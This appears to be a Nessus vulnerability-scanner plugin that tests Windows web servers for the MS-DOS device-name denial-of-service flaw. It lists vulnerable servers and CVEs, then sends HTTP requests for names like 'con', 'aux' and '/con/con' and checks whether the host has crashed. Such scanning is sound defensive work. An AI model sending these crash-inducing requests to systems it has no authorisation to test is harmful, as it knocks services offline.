#
# This script was written by Michel Arboi <arboi@alussinan.org>
#
# See the Nessus Scripts License for details
#
# Script audit and contributions from Carmichael Security <http://www.carmichaelsecurity.com>
#      Erik Anderson <eanders@carmichaelsecurity.com>
#      Added links to the Bugtraq message archive, Microsoft Knowledgebase,
#      and known vulnerable servers list
#
# Vulnerable servers:
# vWebServer v1.2.0 (and others?)
# AnalogX SimpleServer:WWW 1.08		CVE-2001-0386
# Small HTTP server 2.03		CVE-2001-0493
# acWEB HTTP server?
# Xitami Web Server                     BID:2622, CAN-2001-0391
# Jana Web Server                       BID:2704, CVE-2001-0558
# Cyberstop Web Server                  BID:3929, CAN-2002-0200
# General Windows MS-DOS Device         BID:1043, CVE-2000-0168
# Apache < 2.0.44			CAN-2003-0016
# Domino 5.0.7 and earlier		CAN-2001-0602, BID: 2575
#
#############
# References
#############
 
#
# Date: 25 Sep 2002 09:08:20 -0000
# From:"DownBload" <downbload@hotmail.com>
# To: bugtraq@securityfocus.com
# Subject: IIL Advisory: Vulnerabilities in acWEB HTTP server
#

if(description)
{
 script_id(10930);
 script_cve_id("CVE-2001-0386", "CVE-2001-0493", "CAN-2001-0391", 
 	       "CVE-2001-0558", "CAN-2002-0200", "CVE-2000-0168",
	       "CAN-2003-0016", "CAN-2001-0602");
 script_bugtraq_id(2622, 2704, 3929, 1043, 2575);
 script_version("$Revision: 1.14 $");
 script_name(english:"HTTP Windows 98 MS/DOS device names DOS");
 
 desc["english"] = "
It was possible to freeze or reboot Windows by
reading a MS/DOS device through HTTP, using
a file name like CON\CON, AUX.htm or AUX.

A cracker may use this flaw to make your
system crash continuously, preventing
you from working properly.

Solution : upgrade your system or use a 
HTTP server that filters those names out.

Risk factor : High";

 desc["francais"] = "
Il a t possible de geler ou faire rebooter
Windows en lisant un priphrique MS/DOS par
HTTP, via un nom comme CON\CON, AUX.htm ou AUX.

Un pirate peut utiliser ce problme pour faire 
continuellement rebooter votre systme, vous 
empchant de travailler correctement.

Solution : mettez  jour votre systme ou 
utilisez un serveur HTTP qui filtre ces noms.

Facteur de risque : Elev";

 script_description(english:desc["english"], francais:desc["francais"]);
 
 summary["english"] = "Crashes Windows 98";
 summary["francais"] = "Tue Windows 98";
 script_summary(english:summary["english"], francais:summary["francais"]);
 
 script_category(ACT_KILL_HOST);
 
 
 script_copyright("This script is Copyright (C) 2001 Michel Arboi");
 family["english"] = "Denial of Service";
 family["francais"] = "Dni de service";
 script_family(english:family["english"], francais:family["francais"]);
 script_dependencies("find_service.nes");
 script_require_ports("Services/www", 80);
 exit(0);
}

include("http_func.inc");

start_denial();

dev[0] = "aux";
dev[1] = "con";
dev[2] = "prn";
dev[3] = "clock$";
dev[4] = "com1";
dev[5] = "com2";
dev[6] = "lpt1";
dev[7] = "lpt2";

ext[0] = ".htm";
ext[1] = ".";
ext[2] = ". . .. ... .. .";
ext[3] = ".asp";
ext[4] = ".foo";
ext[5] = "-";
ext[6] = ".bat";

port = get_kb_item("Services/www");
if(!port)port = 80;
if(get_port_state(port))
{
 for (i = 0; dev[i]; i = i + 1)
 {
  d = dev[i];
  for (j = 0; ext[j]; j = j + 1)
  {
   e = ext[j];
   if (e == "-")
    name = string("/", d, "/", d);
   else
    name = string("/", d, e);
   # display(name);
   req = http_get(item:name, port:port);
   soc = http_open_socket(port);
   if(soc)
   {
    send(socket:soc, data:req);
    r = http_recv(socket:soc);
    http_close_socket(soc);
   }
  }
 }
}
 
alive = end_denial();					     
if(!alive)
{
 security_hole(port);
 set_kb_item(name:"Host/dead", value:TRUE);
}
